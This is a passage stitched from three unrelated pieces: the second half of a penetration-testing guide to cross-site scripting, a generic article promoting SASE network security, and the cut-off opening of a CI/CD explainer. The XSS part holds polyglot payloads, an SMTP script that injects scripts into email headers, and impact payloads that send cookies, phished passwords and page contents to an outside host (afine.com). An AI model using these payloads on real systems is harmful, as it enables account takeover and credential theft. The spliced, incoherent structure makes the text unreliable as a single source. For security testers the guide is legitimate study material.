jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/test.jpg">
" onclick=alert(1)//<buttononclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`

To be efficient during manual testing, use polyglots which can fit in many HTML contexts. If you need more polyglots, visit this link.

III. TESTING SANITIZATION & MISHANDLING OF SPECIAL CHARS

Check how the target handles special characters.

  • Use a special_chars.txt — a minimalistic list (420 payloads) containing the characters shown below in multiple encodings:

You can also inject them in a single line, to save the time, but it will be harder to track, which of the special character is misshandled.

!"#$%&'()*+,-./:;<=>?@[\]^_`{|}\n\r
  • If you have more time to spare, use Crimson single-char — this list contains many special chars with multiple encodings (1500 payloads).

After checking how the target handles special characters, you will know if it is possible to use payloads for instance with HTML entity, and you can widen the attack surface, because maybe some special character will trigger an error in the application which will reflect your payloads.

IV. BREAKING THE RENDERING

Use <plaintext> to stop the page rendering and display it as plain text.

Source: Own study — breaking the rendering of the HTML using <plaintext> tag.

The alert() JavaScript function could be blocked. To identify the XSS it is better to use tags and functions that are rarely used or less known. Another example: <script>print()</script> .

V. JUMPING INTO THE DEBUGGER

Use <script>debugger;</script> to stop the JS execution.

Source: Own study — Stopping the JS execution using. debugger; functionality.

Another way of identyfing the XSS without alert(). The bonus when using the debugger; is that the JS execution breaks on the vulnerable function and it is easier to get the idea what is wrong with the code.

VI. IDENTIFYING THE PAYLOAD

Use console.log(n) to identify payloads and observe the dev console.

Source: Own study — Identifying the payload source using console.log().

In case of Stored XSS, or some recursive functions that triggers the alert() popup window many times, it is hard to close them all. Additionally, sometimes it is hard to identify where the payload was injected. The console.log(n) can be handy in this situation.

VII. DETERMINING THE SCOPE

Use document.domain and window.origin to know the scope of the XSS.

Source: Own study — Using console.log()document.domain and window.origin for determining the scope.
<script>console.log("XSS from the FUNCTION_XYZ of page XYZ\n".concat(document.domain).concat("\n").concat(window.origin))</script>

Sandboxes isolates user-uploaded HTML and JavaScript to make sure that they cannot access any user data. Use document.domain and window.origin to know in which scope the XSS is actually executing. You can also use document.cookie to check if you can access the user session cookie.

VIII. DOM INVADING WITH DOM INVADER

Use Burp Suite DOM Invader to find client-side & PostMessage XSS easily.

Finding DOM based XSS.

Source: Own study — Example identification of a DOM XSS using DOM Invader.
Source: Own study — Image shows the application's state after clicking “Exploit” in DOM Invader.

Finding PostMessage based XSS.

Source: Own study — Fiding flaws in web message using DOM Invader Postmessage interception.
Source: Own study — Exploiting web-message-based XSS from DOM Invader.
<iframe src="https://TARGET/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">
Source: Own study — Triggering the print() immediately after hitting Send button.

DOM Invader can help you find client-side & web-bessage XSS bugs with minimum effort. Test with Auto fire and DOM clobbering options ON and then OFF , since they can break the application functionality.

IX. AUTOMATING THE REFLECTED & BLIND XSS TESTING

Use xssValidator to automate the Reflected & Blind XSS testing.

  • First, add the host to the scope using the Burp Suite Target tab.
Source: Own study — Checking for reflected values with Paramalyzer & sending the request for further testing.
  • After analysis, send the request to the Repeater and then to Intruder.

Do not know, why there is no option for sending it straight to the Intruder.

  • Add the blind payloads to the xssValidator payload lists:
Source: Own study — Adding blind payloads to the payload list in the Burp Suite xssValidator extension tab.
  • Then configure the Intruder with the xssValidator payload generator, as was shown in the Tooling section, and start the attack.
Source: Own study — The grep will mark the successful attack results.
  • Open the request in the browser to verify the vulnerability existance:
Source: Own study — Confirming successful Reflected XSS injection.

 

  • Do not forget to check the collaborator for possible Blind XSS.
 
Source: Own study — Burp Suite Collaborator HTTP interactions after injecting the Blind XSS payloads.

This way, the testing of Reflected, Blind and some of DOM XSS (where the vulnerable parameter value could be provided using the request body), can be automated to speed up the assessemnt.

X. AUTOMATING THE STORED XSS TESTING

Use DalFox sxss mode or Burp Suite Intruder to test for Stored XSS.

Using DalFox sxss mode for testing.

dalfox sxss TARGET_URL -X POST -d POST=DATA -p PARAM_TO_ATTACK -H "COOKIE_HEADER"--trigger VERIFY_URL
  • Additionally, you can use the below options to test only chosen parameters and omit the parameter mining to speed up the testing:
-p PARAM_TO_ATTACK --skip-mining-all
dalfox sxss "https://web-security-academy.net/post/comment" -X POST -d "csrf=jwBbTL1qqjj4185QoqQK2S7dsSi7GKPI&postId=7&comment=test&name=test&email=test%40afine.com&website=http%3A%2F%2Fafine.com" -p name,comment -H "Cookie: session=5S6Y6F93g81VMaytbjeq3Wkn2rVk9sJF" --trigger "https://web-security-academy.net/post?postId=7" --skip-mining-all -F
 
Source: Own study — The example Stored XSS testing using DalFox sxss mode.
Source: Own study — DalFox payload triggered after visiting the page.

It is recommended to first use the --proxy http://127.0.0.1:8080/option to check in Burp Suite if there is everything okay, and after that restart the tool without --proxy option to speed up the testing.

Using Burp Suite Intruder for testing.

  • First, send the request to Intruder and select the injection points.
Source: Own study — Choosing the injection points.
  • It is recommended to number your payloads to optimize identifying which one has been triggered after injecting phase.

If you want to test with the DalFox payloads, you can use the below command to generate the numbered wordlist — around 1600 payloads:

dalfox payload --make-bulk
Source: Own study — The payloads are numbered, making it easy to find which payload was triggered.
  • Paste payloads to the Intruder and start the attack.
 
Source: Own study — Pasting the DalFox payloads into the Payload list and starting the attack.
  • After sending all payloads, visit the website and identify if any of them could be triggered.

Personally I like the Intruder method more, but I wanted to show the DalFox since it can additionally find hidden parameters, automatically confirm if the target is vulnerable and show the working payload without visiting the page.

XI. TESTING STORED XSS IN MULTIPLE CONTEXTS

Do not forget about the “privileged sinks”.

  1. Identify the sources from a low-privileged level account.
  2. Find their sinks available only for highly privileged accounts.
  3. Inject the payloads from the low-privileged account into the sources.
  4. Visit the sinks in a forbidden area using the privileged account.
  5. Check if any payload has been triggered.

If you are testing the application where there are multiple privileges levels and there are zones in the applications where only high privileged users have access to (for instance Admin Control Panel). Do not forget to test these sinks.

XII. BOMB TESTING

If there is no length limit of the input, use all of the payloads at once.

Just copy-paste all of your payloads and check the results.

If you cannot use the new line character in your input field you can do the small trick using the Vritual Studio Code.

wget https://raw.githubusercontent.com/payloadbox/xss-payload-list/master/Intruder/xss-payload-list.txt
code xss-payload-list.txt
Source: Own study — Removing the new line characters from the wordlist using VScode.

This method can trigger another error, which could reflect your input and be vulnerable to Cross-Site Scripting.

XIII. MASS TESTING

When you have a lot of URLs to test, use CLI tools and automatic scanners.

  1. Proxy all urls.txt to Burp Suite.
  2. Use the XSS profile from Burp Bounty on the proxied URLs.
  3. Use the Active Scanning on the proxied URLs.
  4. Use XSStrike on urls.txt.
  5. Use DalFox on urls.txt.
  6. Modify the URLs to remove the queries (?all=after&the=question&mark )
  7. Use XSStrike on all modified URLs with the --path flag.
# PROXY TO BURP
httpx -http-proxy http://127.0.0.1:8080 -l urls.txt
# XSStrike
python3 xsstrike.py --seeds urls.txt -l 3 -t 100 --log-file xsstrike_queries.log --file-log-level VULN | tee -a xsstrike_all.log
# DALFOX
cat urls.txt | dalfox pipe --mass --silence --no-color -o dalfox.txt
# REMOVING QUERIES
sed -E 's/\?.*//' urls.txt | sort -u > urls_path_only.txt
# XSStrike - TESTING PATHS INJECTIONS
for url in $(cat urls_path_only.txt); do python3 xsstrike.py -u "$url" --path --log-file xsstrike_paths.log --file-log-level VULN | tee -a xsstrike_all.log; done

This way you can test for low hanging fruits on a scale.

XIV. WEBMAIL TESTING

Inject XSS payloads in mail headers and visit the webmail application.

  • First, inject the same payload in all headers to identify the working payload.
python fuzzer.py -f 'ATTAKCER_MAIL' -t 'TARGET_MAIL' -s 'SMTP_SERVER' -w 'PAYLOAD_TXT'
import smtplib,sys,getopt
from email.mime.multipart import MIMEMultipart

EMAIL_HEADERS = ["From","To","Date","Subject","Body","Accept-Language","Alternate-Recipient","Autoforwarded","Autosubmitted","Bcc","Cc","Comments","Content-Identifier","Content-Return","Conversion","Conversion-With-Loss","DL-Expansion-History","Deferred-Delivery","Delivery-Date","Discarded-X400-IPMS-Extensions","Discarded-X400-MTS-Extensions","Disclose-Recipients","Disposition-Notification-Options","Disposition-Notification-To","Encoding","Encrypted","Expires","Expiry-Date","Generate-Delivery-Report","Importance","In-Reply-To","Incomplete-Copy","Keywords","Language","Latest-Delivery-Time","List-Archive","List-Help","List-ID","List-Owner","List-Post","List-Subscribe","List-Unsubscribe","Message-Context","Message-ID","Message-Type","Obsoletes","Original-Encoded-Information-Types","Original-Message-ID","Originator-Return-Address","PICS-Label","Prevent-NonDelivery-Report","Priority","Received","References","Reply-By","Reply-To","Resent-Bcc","Resent-Cc","Resent-Date","Resent-From","Resent-Message-ID","Resent-Reply-To","Resent-Sender","Resent-To","Return-Path","Sender","Sensitivity","Supersedes","X400-Content-Identifier","X400-Content-Return","X400-Content-Type","X400-MTS-Identifier","X400-Originator","X400-Received","X400-Recipients","X400-Trace"]

full_cmd_arguments = sys.argv
argument_list = full_cmd_arguments[1:]
short_options = "hf:t:w:s:"
long_options = ["help", "from", "to", "wordlist", "smtp"]
try:
arguments, values = getopt.getopt(argument_list, short_options, long_options)
except getopt.error as err:
sys.exit(2)

def inject_in_all_headers(me,you,payload,smtp_server):
'''Injecting the given payload in all email headers fields at once.'''
msg = MIMEMultipart()
msg['From'] = me
msg['To'] = you
for h in EMAIL_HEADERS[2:]:
msg[h] = '%s' % payload

s = smtplib.SMTP(smtp_server)
s.sendmail(me, [you], msg.as_string())
s.quit()

payloads_array = list()
for current_argument, current_value in arguments:
if current_argument in ("-h", "--help"):
print("USAGE: \tMTA_tester.py\n\n \t\t-h --help => Show this help \n\t\t-f --from => \"attacker@smtp.vps.com\" \n\t\t-t --to => \"victim@gmail.com\" \n\t\t-w --wordlist => oob.txt \n\t\t-s --smtp smtp.vps.com")
if current_argument in ("-f", "--from"):
me = current_value
if current_argument in ("-t", "--to"):
you = current_value
if current_argument in ("-s", "--smtp"):
smtp_server = current_value
if current_argument in ("-w", "--wordlist"):
with open(str(current_value)) as payloads:
for payload in payloads:
payloads_array.append(payload.rstrip('\n'))
for payload in payloads_array:
print(payload)
print(smtp_server)
inject_in_all_headers(me,you,payload,smtp_server)
  • Then identify the vulnerable header.

For example, if the "><script>alert(‘xss’)</script> payload worked, use the below function to find out which header is vulnerable:

def iterate_headers(me,you,smtp_server):
msg = MIMEMultipart()
msg['From'] = me
msg['To'] = you
for h in EMAIL_HEADERS[2:]:
payload = '"><script>alert(\''+h+'\')</script>'
msg[h] = '%s' % payload
s = smtplib.SMTP(smtp_server)
s.sendmail(me, [you], msg.as_string())
s.quit()
print(h + ' HEADER SENT')
  • After that, prepare a proof of concept script:
def poc(me,you,payload,smtp_server):
msg = MIMEMultipart()
msg['From'] = me
msg['To'] = you
msg['POC_HEADER_CHANGE_IT'] = '%s' % payload
s = smtplib.SMTP(smtp_server)
s.sendmail(me, [you], msg.as_string())
s.quit()

XV. TESTING UPLOAD FUNCTIONALITIES

Upload these files and check if any could be triggered.

The upload functionality testing will be further described in another article from AppSec Tales series later on. However, I described one of the possible XSS scenario in the upload functionality in my previous blog post.

 

IMPACT OF XSS

The impact may vary, depending on the context. In this section, you can find script templates that can help you create PoC in various scenarios.

  • The example XSS payload that loads the x.js file as a script source.
<script/src=https://afine.com/x.js%20/>
  • You can host it using a simple python server:
sudo python -m http.server 80

DEFACING

Changing the page content.

  • The example x.js script content for defacing the website:
body = document.getElementsByTagName("body")[0]
body.innerHTML = "<h1>YOUR_CUSTOM_HTML_CONTENT</h1>

PHISHING

Creating a login form for stealing the credentials.

  • The example body.innerHTML content imitating the basic phishing form:
<html>
<head>
<title>Register Page</title>
</head>
<body>
<!-- Add a logo at the top of the page -->
<center><img src="https://afine.com/logo.png" alt="Your logo" >

<h1>Register Page</h1>
<form onsubmit="sendCredentials()">
<label for="email">Email:</label><br>
<input type="text" id="email" name="email"><br>
<label for="password">Password:</label><br>
<input type="password" id="password" name="password"><br><br>
<input type="submit" value="Submit">
</form>
</center>

<script>
function sendCredentials() {
// Get the email and password values from the form
var email = document.getElementById("email").value;
var password = document.getElementById("password").value;

// Encode the email and password in base64
var base64Credentials = btoa(email + ":" + password);

// Send the base64-encoded credentials to the server
var url = "https://afine.com/?creds=" + base64Credentials;
var xhr = new XMLHttpRequest();
xhr.open("GET", url, true);
xhr.send();
}
</script>
</body>
</html>

SESSION HIJACKING

Stealing the victim's cookies.

  • The example x.js content for stealing the cookie:
new Image().src ="http://afine.com/?cc="+escape(document.cookie);

SESSION RIDING

Acting in the context of the victim session.

  • The example x.js content for reading the target website body from a victim session:
function read_body(xhr) {
var data;
if (!xhr.responseType || xhr.responseType === "text") {
data = xhr.responseText;
} else if (xhr.responseType === "document") {
data = xhr.responseXML;
} else if (xhr.responseType === "json") {
data = xhr.responseJSON;
} else {
data = xhr.response;
}
return data;
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
// Send the Base64 encoded data to your server.
var encodedData = read_body(xhr);
var url = "https://afine.com/whatever.php?data=" + encodeURIComponent(encodedData);
xhr.open("GET", url, true);
xhr.send(null);
}
}
xhr.open('GET', 'http://TARGET/to/read', true);
xhr.send(null);

If you want to perform action in context of the victim session, (for example adding your low privilege user to administrator group) remember to minimize the request data (remove unnecessary headers, parameters, and data) and if it is possible, change the POST to GET (minimize the JS code later on).

FINAL WORDS

Are these all possibilities? Of course not. This list is just the tip of the iceberg. However, by ticking each item off this list, you will surely not miss a simple vulnerability during the test. To learn more about the XSS topic, follow the below links:




The article was originally published at: https://karol-mazurek95.medium.com/appsec-tales-xii-xss-dd5fcc717187

Abstract:

SASE (Secure Access Service Edge) is a comprehensive solution that aims to improve the security of an organization's network by providing centralized and cloud-based security services. This solution streamlines access to resources and enhances the security of the network edge. SASE is important because it helps organizations cope with the challenges posed by the increasing complexity of a cloud-forward system that relies on a distributed workforce and SaaS services. The future of cloud security lies in SASE, which promises to provide organizations with a comprehensive and secure solution to manage their network security needs.

What is SASE?

Secure Access Service Edge (SASE) is a cutting-edge technology designed to provide enhanced network security, performance, and simplicity to organizations. The term was first introduced by the well-known research and advisory company, Gartner. SASE aims to address the increasing need for secure and streamlined network access in the face of digital transformation, edge computing, and remote work. With SASE, organizations can benefit from a flexible and scalable network that connects employees and offices across the world, regardless of their location and device. This way, organizations can keep pace with the changing needs of their digital business operations.

SASE merges Wide Area Network (WAN) capabilities and cloud-based network security services, including zero-trust network access, secure web gateways, cloud access security brokers, and firewalls-as-a-service (FWaaS). This combination offers organizations a single service provider solution to their network and security needs, reducing the number of vendors and streamlining the network access process.

What is the importance of SASE?

As companies continue to transition to cloud-based systems, they face the challenge of enhancing security while also simplifying their operations and reducing costs. The move to remote work has only intensified the demand for hybrid cloud solutions and software as a service (SaaS), making these requirements even more pressing.

One technology that has garnered significant attention in the enterprise security space is Secure Access Service Edge (SASE). This architecture offers an attractive solution by combining network components like VPN and SD-WAN with security features like Zero Trust and contextual access.

While SASE is still largely a concept or goal for most organizations, leading tech vendors such as Cisco, Zscaler, Akamai, Palo Alto Networks, and McAfee have adopted the idea and are promoting components of their products as essential for realizing SASE. Despite its allure, companies need to overcome various obstacles to make SASE a reality. The concept may sound simple in theory, but implementing it in practice requires careful planning and execution.

The core security components of SASE

  • Cloud Access Security Broker (CASB)

CASBs are responsible for performing several security functions for cloud-based services, including detecting shadow IT (unauthorized corporate systems), securing confidential data through access control, and ensuring compliance with data privacy regulations.

  • Secure Web Gateways (SWG)

SWGs play a crucial role in protecting against cyber threats and preventing data breaches by filtering out unwanted content from web traffic, blocking unauthorized user activity, and enforcing an organization's security policies. These gateways are particularly suitable for providing security for remote workforces as they can be deployed in a distributed environment.

  • Firewall-as-a-Service (FWaaS)

FWaaS refers to firewalls that are delivered as a service from the cloud, protecting cloud-based platforms, infrastructure, and applications against cyber-attacks. This service provides a set of security capabilities, including URL filtering, intrusion prevention, and uniform policy management across all network traffic.

  • Zero Trust Network Access (ZTNA)

ZTNA platforms provide enhanced security to protect against potential data breaches by locking down all internal resources, applications, and devices from public view. They require real-time verification of every user, ensuring that only authorized users have access to sensitive information.

The best reasons to switch to SASE

Secure Access Service Edge (SASE) is the future of network security and is rapidly gaining popularity among organizations. SASE is a cloud-based architecture that combines Virtual Private Network (VPN) and Software-Defined Wide Area Network (SD-WAN) functions with cloud security services such as firewalls, secure web gateways, cloud access security brokers, DNS security, data loss prevention, and zero trust network access. It provides a centralized and simplified security architecture for all users and traffic by routing it through a single on-premises access point. The traditional VPN approach is becoming less effective with the growing number of remote locations and cloud services. SASE addresses these challenges by offering secure data exchange without relying on a central hub with security functions. This is achieved through a unified policy management based on user identities and flexible transport routes.

Here are five compelling reasons why organizations should consider switching to SASE:

  1. Transparency: SASE provides a comprehensive overview and transparent reporting, allowing organizations to detect and respond to cyber threats more efficiently.
  2. Secure network access: SASE provides secure network access from anywhere and on any device through end-to-end encryption and reliable protection on public networks.
  3. Resource savings: SASE eliminates the need for network operations, reducing effort and costs.
  4. Security policies: SASE enables organizations to define corporate policies centrally and is compatible with the Zero Trust concept. It checks devices for trustworthiness and user identities to block unauthorized access.
  5. Improved performance: Outsourcing to the cloud and simplifying the architecture can significantly increase performance as it eliminates traffic redirection to a central computing system and reduces latency.

The Adoption of Secure Access Service Edge (SASE)

Gartner, a global research and advisory firm, has predicted that SASE will be widely adopted by 2023 with a 20% rate of adoption. The firm believes that the demand for SASE capabilities will have a major impact on the enterprise network and security architecture, and change the competitive landscape in the industry.

In the coming years, the trend toward SASE adoption is expected to pick up the pace and become more pressing. Another research conducted by Palo Alto Networks and Gartner has outlined the following predictions for the future of SASE:

By 2025, 80% of enterprises are expected to have adopted a strategy to unify their web, cloud services, and private application access through a SASE/SSE architecture, compared to the 20% in 2021. By 2025, 65% of enterprises are expected to have consolidated their SASE components into one or two specifically partnered SASE vendors, up from 15% in 2021. By 2025, it is predicted that 50% of SD-WAN purchases will be part of a single vendor SASE offering, up from less than 10% in 2021.

Challenges of SASE Deployment

The implementation of SASE, or the Secure Access Service Edge, brings with it several challenges. SASE involves the integration of security services with network services, making access to SaaS and multi-cloud functions secure. It includes features found in SD-WAN deployments, such as path resiliency and redundancy, app routing, visibility and reporting, vendor-specific software-defined capabilities, and VPN.

One of the prerequisites for SASE is a virtualized network. SD-WAN, which helps virtualize networks and their operations, has already been widely adopted, but it requires the replacement of older, single-function switches and routers with new equipment. Most enterprises have virtualized a significant portion of their networks, but the more challenging part of realizing SASE is the need for a security architecture that can be fully integrated and managed like software-defined networks.

The deployment of Secure Access Service Edge (SASE) technology faces numerous challenges, one of which is the need for a unified approach to secure access, threat protection, policy management, and device management. The challenge lies in the fact that many enterprises have a disparate range of security components in place, making it difficult to integrate them into a cohesive security architecture. Another obstacle to overcome is the lack of coordination between networking and security operations in many organizations. Typically, these two functions are managed by separate departments and may not have a close working relationship. For SASE to be successfully deployed, network operations and security operations must collaborate and align their efforts. Without this collaboration, it is impossible to implement SASE, making it a major challenge in the deployment process.

The majority of enterprises currently have a collection of security products in place, which are often standalone. Some organizations have dozens or even hundreds of unique security applications running on different platforms, from data centers and cloud instances to networks, hardware endpoints, and individual apps. Even the essential VPN for secure network connections may not be compatible with all the devices and servers within an organization, and the increasing number of network options (such as 5G, WiFi 6, and broadband) adds to the compatibility challenges.

How to Approach Adopting SASE?

  • Data Protection: Ensure that there is consistency in policies and procedures for data protection both in transit and at rest. Implement access control, encryption, and segmentation of data to protect it.
  • Data Distribution Model: Consider the entire data landscape and understand where the data will be stored, as it might be stored in multiple locations.
  • Improving Efficiency: Look at current projects and determine if they need to be modified to accommodate cloud-hosted services in the next 2-4 years, backup services (whether local or cloud-based), and sensitive services.
  • Data Flow and Migration: Evaluate the current data flow within the organization's on-premises deployment and make changes to ensure a smooth flow. Have a comprehensive plan to identify how the data will move across environments to maintain its integrity.
  • Centralized Visibility and Policy Control: Have a transparent approach to documenting network users, the data they share, connections they access, access authorization, and policies for non-compliance. Focus on the entire network, not just the edge.
  • Data Segmentation: Handle security incidents at the edge and protect sensitive data residing at the data center by implementing a fool-proof approach. Keep visibility throughout the environment, not just at the edge, to keep the data protected.

The Implementation of SASE Poses Significant Integration Challenges

Contrary to what some vendors may claim while marketing their products, the reality is that implementing SASE is a substantial integration challenge. Smaller organizations may lack the necessary resources to achieve this, even if they have some components in place such as SD-WAN and cloud access gateways.

Even larger organizations face difficulties in integrating their network and security tools and cloud management products, making sure that information can be shared and managed through a single interface. Although it is possible to implement SASE without a unified control plane or a single management console, this solution is more costly in terms of the required skills, manpower, and time compared to a unified management interface. Additionally, it increases the likelihood of issues arising due to a lack of visibility when non-compatible systems are manually managed. Some network operators, such as Verizon, offer "SASE as a Service" built on top of their connectivity and security service operations. However, enterprises will still need to manage the relationship and allocate resources to ensure that the latest network and security updates are fully implemented as their business needs and infrastructure change.

For many companies, the best approach to SASE is to engage a systems integrator that can not only integrate the necessary tools but also manage the day-to-day operations of the SASE architecture implementation. However, enterprises should be aware that SASE is a constantly evolving target, with few companies having all the components in place, and those that do likely face upgrades and infrastructure changes as capabilities mature. Furthermore, service providers often have their preferred partners, which may not be compatible with the vendor products that the enterprise currently uses. Despite this, this route may still be advantageous as these operators can leverage their influence over vendor apps and their experience in making SASE effective.

Core Capabilities of the SASE Framework

The SASE (Secure Access Service Edge) framework has several essential components to ensure the secure access of a remote workforce and prevent data breaches in a business. The COVID-19 pandemic has shifted the workplace landscape, with many employees still working remotely, making it crucial for companies to have the right tools to secure their networks.

  • One of these tools is SD-WAN as a service, which enables secure access to cloud-based resources and applications. It creates a virtual high road for network traffic and distributes it across the WAN to ensure optimal performance.
  • Zero Trust Network Access (ZTNA) is another core capability of SASE that plays an important role in securing the corporate network. It requires authentication from employees before granting access to the network. After verifying their identities, ZTNA enables access but restricts their movement within the network, ensuring that only authorized users are present in the corporate network.
  • The Secure Web Gateway (SWG) and Firewall as a Service (FWaaS) are security components that monitor and scan for any unauthorized access or malware, while also distributing user-generated traffic across the cloud. On the other hand, the Cloud Access Security Broker (CASB) acts as a mediator between users and applications and monitors the data flow between them to ensure the security of confidential data and comply with data privacy regulations.

Top benefits of SASE in Cybersecurity

The traditional remote access applications are often not secure enough, lacking important security functions such as IPS, SWG, and NGFW. This leaves businesses vulnerable and in need of alternative solutions. However, this patchwork approach does not provide the level of visibility and security desired.

  • Security

A holistic security approach that incorporates the SASE framework can address these security failures. SASE integrates unique security features into the underlying network, including anti-malware, firewalling, IPS, and URL filtering mechanisms. This way, all cloud, mobile, and website edges receive equal protection.

The SASE network includes several routing and security features, including zero-trust network access, RBI, malware protection, firewall as a service, DNS reputation, intrusion prevention and detection, secure web access, and cloud access security broker. With the right SASE structure, businesses can be protected against cyber-attacks and detect the source of malware.

In addition to providing comprehensive security features, SASE also offers cost savings. The traditional approach of provisioning, maintaining, sourcing, and monitoring multiple point solutions can drive up enterprise Opex and Capex. With SASE, businesses can eliminate the need to deal with multiple cloud solution vendors and instead get all the solutions from a single provider. This reduces the costs associated with network maintenance, upgrades, IT staffing, patches, and appliance buying. SASE also simplifies the network by eliminating the need for virtual and physical appliances, embracing a single cloud-native solution.

  • Enhances Scalability

SASE is designed to meet the demands of real-time applications by providing high-performance network connections. Traditional VPN security methods have been hindered by security-related delays that impact application performance. To stay ahead of the competition, businesses need automated solutions that can secure connections quickly and efficiently. SASE provides these capabilities, enabling businesses to scale their network as needed.

  • Simplified Network Management

SASE eliminates the difficulties of managing a complex network and its associated costs. Unlike traditional point solutions, SASE is a single cloud-based solution that offers easy management. In traditional networks, managing multiple devices such as NGFW, VPN, SWG, and SD-WAN in different office locations requires a large IT staff. As the number of offices increases, so does the need for additional personnel.

  • Complete SD-WAN Integration

The adoption of Software-Defined Wide Area Network (SD-WAN) technology has revolutionized the way businesses connect to the cloud. With SASE, businesses can move away from traditional, proprietary WAN solutions and benefit from lower operational costs, increased flexibility, and improved performance. SD-WAN optimizes traffic flow by utilizing a centralized control plane, resulting in better application performance, reduced IT budgets, increased productivity, and a better user experience. SASE eliminates this problem by providing a single cloud-based solution that centralizes control and protection of the entire network. This simplifies management and reduces the need for large IT staff.

  • Stable Data Protection for Your Business

Every day, businesses handle a large amount of important data, including sensitive customer information and confidential business data. Protecting this information is critical to avoiding data loss or exposure to malicious actors. The use of a SASE framework offers a solution to this challenge, with built-in automatic cloud data loss prevention (DLP). The SASE framework integrates DLP into key control points, ensuring that all forms of data are secure and protected. This eliminates the need for multiple protection tools, as the SASE DLP covers various cloud environments, devices, and applications.

SASE DLP provides businesses with the ability to enforce protection policies across their entire network, from a single central point. It also authenticates devices and users before granting access to the business applications and data, further enhancing the security of the network.

  • Enhanced Network Performance

With the integration of SASE, businesses can experience improved network performance. The solution constantly tracks and monitors the flow of data, giving businesses a comprehensive view of how their data is being distributed across different data centers and cloud environments.

By monitoring both inbound and outbound processes, businesses can receive real-time information from a single network interface or portal. This eliminates the latency issues that were previously experienced with traditional network monitoring methods.

With SASE, businesses can enjoy fast and reliable network connections, regardless of the remote location of the portal user. This enhances the overall user experience and improves the efficiency of remote data access.

How to choose partners for SASE?

Choosing the right partner for your SASE solution is a crucial step in ensuring the security and efficiency of your cloud-based business processes. To ensure you make the right choice, here are some factors you should consider:

  • Integrability

Ensure that the SASE solution offered by the potential partner is compatible with the cloud computing platform you use. For example, if you use Microsoft Azure, your SASE must be functional with it.

  • Previous work

Ask the vendor to provide case studies from previous projects and consider reaching out to firms that have worked with them to gain insights into their partnership capabilities.

  • International credentials and certificates

Check for certifications such as ISO 27001, 27002, and HIPAA to verify the partner's ability to handle sensitive data securely.

  • Price

Compare prices offered by different vendors and make a decision based on your budget and needs.

  • Customer support model

Evaluate the provider's customer service policies, as different providers have different approaches. Consider the level of support you need based on your organization's IT capabilities.

Why SASE Is the Future of Remote Access?

The traditional networking model has been around for a while now, with applications and data residing in a central data center. This central location serves as the hub for users, workstations, and applications to access company resources, which is usually achieved through a local private network or a secondary network connected to the primary network through a VPN or other secure line. However, with the evolution of technology, this traditional approach has become increasingly insufficient in meeting the demands of a cloud-forward system that operates with a distributed workforce and utilizes SaaS services. It is no longer practical to direct all network traffic through a corporate data center when data and applications are hosted in a distributed cloud environment.

SASE (Secure Access Service Edge) offers a solution to this problem by implementing network controls at the cloud edge, instead of a unified data center. This approach streamlines security and network services, providing a more secure network edge without the need for a layered stack of cloud services with separate management and configuration requirements. Organizations can take advantage of SASE by implementing identity-based zero-trust access policies at the network edge. This expands the network's security perimeter to cover remote users, offices, devices, and applications, enhancing overall security. In conclusion, SASE is the future of remote access, providing organizations with a secure, flexible, and efficient solution to meet the demands of a rapidly changing technological landscape.

The implementation of SASE (Secure Access Service Edge) brings with it numerous benefits that make it a valuable solution for organizations looking to improve their network security. Some of these benefits include:

  • Improved Performance: Service and application performance are optimized through a routing mechanism that minimizes latency and directs traffic through a high-performance SASE backbone. This is particularly important for latency-sensitive applications such as video and VoIP.
  • Streamlining Access: SASE architectures provide consistent, secure, and fast access to all resources from any physical location, unlike data center-based access models, which can be slow and unreliable.
  • Cost Optimization: The cloud model used by SASE is cost-efficient, allowing organizations to spread their costs across monthly fees, instead of making an upfront capital investment. It also allows businesses to consolidate their vendors and reduce the number of virtual and physical appliances and their associated costs, including purchasing and maintenance costs. Additionally, delegating the responsibilities of upgrades and maintenance to the SASE provider reduces costs even further.
  • Simplifying the System: SASE's cloud-based security model and single-vendor WAN functions simplify the system compared to traditional multi-vendor approaches, which utilize different security appliances across different locations. The single-pass traffic inspection architecture of SASE helps to simplify the system further by decrypting and inspecting traffic streams in a single pass using different policy engines, instead of combining different inspection services.
  • Enhanced Usability: SASE often reduces the number of agents and applications required by a device, replacing them with a single, user-friendly application. This ensures a consistent user experience regardless of the user's location or the resource being accessed.

Conclusion

In conclusion, SASE is a promising solution that provides organizations with the benefits of simplified systems, streamlined access, cost optimization, improved performance, and enhanced usability. The implementation of SASE requires careful planning and a clear understanding of an organization's current network security architecture, but the result is a more secure and efficient network. The future of cloud security is closely tied to SASE, which will continue to play an important role in protecting organizations from threats and helping them manage their network security needs. As the demand for cloud-based services continues to grow, organizations must take steps to adopt SASE and stay ahead of the curve in terms of network security.

References:

CI/CD falls under the category of DevOps, which is formed by amalgamating both practices of continuous integration and continuous delivery. The main purpose of continuous integration and continuous delivery, i.e., CI/CD, is to automate almost all the human intervention that is being performed manually, which was a prerequisite to opt for new code.

But now, with CI/CD pipeline, developers have the luxury of making changes into the code that can be directly automated, tested, and pushed out for delivery and deployment. CI/CD helps you minimize the downtime and helps you release the code quicker. Here we will learn top CI/CD security best practices to get the job done in an easier way without the encumbrance of doing manual work.

What is Continuous Integration?

Continuous integration (CI) is simply the process of integrating all the code changes you have made into the core branch of the shared source code repository. It automatically tests every single change you have conducted. By implementing continuous integration, you can instantly catch errors and the issues of security, and fix them with simplistic solutions.

The changes are being merged often that subsequently call for automated testing of changes in code and validation process with the minimization of code conflict, even though the group of developers is working on this very application.

